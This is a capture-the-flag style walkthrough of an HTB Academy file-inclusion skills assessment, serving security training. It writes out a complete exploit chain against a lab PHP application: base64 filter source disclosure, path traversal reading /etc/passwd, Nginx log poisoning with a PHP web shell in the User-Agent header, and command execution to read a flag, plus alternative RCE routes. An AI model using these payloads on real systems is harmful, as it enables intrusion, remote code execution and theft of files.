Skills Assessment Walkthrough

HTB Academy Skills Assessment - File Inclusion

Complete walkthrough of the capstone challenge that combines multiple LFI techniques for RCE and flag extraction.

Challenge: "Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system."

Multi-Technique Exploitation Chain

Phase 1: Source Code Disclosure

# Step 1: Discover vulnerable parameter
http://TARGET_IP:PORT/index.php?page=about

# Step 2: PHP filter source disclosure
http://TARGET_IP:PORT/index.php?page=php://filter/convert.base64-encode/resource=index

# Step 3: Decode and analyze source
echo 'BASE64_OUTPUT' | base64 -d | grep -i admin
# Reveals: // echo '<li><a href="ilf_admin/index.php">Admin</a></li>';

Phase 2: Admin Panel Discovery

# Step 4: Read admin panel source
http://TARGET_IP:PORT/index.php?page=php://filter/convert.base64-encode/resource=ilf_admin/index

# Step 5: Identify LFI in admin panel
# Vulnerable code found:
# $log = "logs/" . $_GET['log'];
# include $log;

Phase 3: LFI Exploitation

# Step 6: Test admin panel LFI
http://TARGET_IP:PORT/ilf_admin/index.php?log=../../../../../../../etc/passwd

# Step 7: Identify web server (Nginx)
http://TARGET_IP:PORT/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log

Phase 4: Log Poisoning & RCE

# Step 8: Poison User-Agent header
curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" \
     "http://TARGET_IP:PORT/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log"

# Step 9: Execute commands
http://TARGET_IP:PORT/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log&cmd=ls /

# Step 10: Find and read flag
http://TARGET_IP:PORT/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log&cmd=cat /flag_*

Techniques Demonstrated

PHP Filter Source Disclosure - Reading application source code
Hidden Functionality Discovery - Finding commented admin panels
Path Traversal & LFI - Basic file inclusion exploitation
Web Server Identification - Testing different log locations
Log Poisoning - User-Agent header injection
Remote Code Execution - Command execution via poisoned logs

Complete Attack Commands

# 1. Source disclosure
curl "http://TARGET_IP:PORT/index.php?page=php://filter/convert.base64-encode/resource=index"

# 2. Admin panel discovery
echo 'BASE64_OUTPUT' | base64 -d | grep -i admin

# 3. Admin source disclosure
curl "http://TARGET_IP:PORT/index.php?page=php://filter/convert.base64-encode/resource=ilf_admin/index"

# 4. LFI testing
curl "http://TARGET_IP:PORT/ilf_admin/index.php?log=../../../../../../../etc/passwd"

# 5. Log poisoning
curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" \
     "http://TARGET_IP:PORT/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log"

# 6. RCE and flag extraction
curl "http://TARGET_IP:PORT/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log&cmd=cat /flag_*"

Expected Flag Format

Flag: HTB{...} or similar format Location: /flag_[random].txt in root directory

Alternative Approaches

If primary method fails, try:

SSH Log Poisoning - If SSH is available
PHP Session Poisoning - If sessions are accessible
Data Wrapper RCE - If allow_url_include=On
Different Log Locations - Apache logs, mail logs, etc.

This walkthrough demonstrates the complete HTB Academy Skills Assessment solution, showcasing advanced file inclusion exploitation techniques.

PreviousPrevention & Hardening NextFile Upload Attacks

Last updated 2 months ago